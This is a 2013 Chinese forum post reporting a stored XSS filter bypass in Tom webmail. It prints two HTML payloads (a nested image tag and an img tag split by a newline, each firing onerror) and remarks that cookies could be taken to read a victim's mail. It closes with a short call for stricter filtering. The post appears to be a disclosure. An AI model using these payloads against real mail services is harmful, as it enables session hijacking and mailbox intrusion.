灯火互联
管理员
管理员
  • 注册日期2011-07-27
  • 发帖数41778
  • QQ
  • 火币41290枚
  • 粉丝1086
  • 关注100
  • 终身成就奖
  • 最爱沙发
  • 忠实会员
  • 灌水天才奖
  • 贴图大师奖
  • 原创先锋奖
  • 特殊贡献奖
  • 宣传大使奖
  • 优秀斑竹奖
  • 社区明星
阅读:3320回复:0

tom邮箱存储型xss xssfilter bypass技巧

楼主#
更多 发布于:2013-01-22 13:00
邮箱漏洞 支持任何浏览器 随便都可以获取cookie什么的 然后利用特殊浏览器查看此人的邮件 或者做做其他事情
跨站代码

<i><image src="x</i>"onerror='alert(1)'>


可爱的xss小弹框


图片:20130122103532323.jpg



修复方案:

邮件的过滤还是不严格 之前也看到过一个


<img src=x "此处打个回车"
onerror='alert(/xss/)'
>
后来改掉了 但是 依然过滤的不好

希望在邮箱过滤方面严格控制

喜欢0 评分0
游客

返回顶部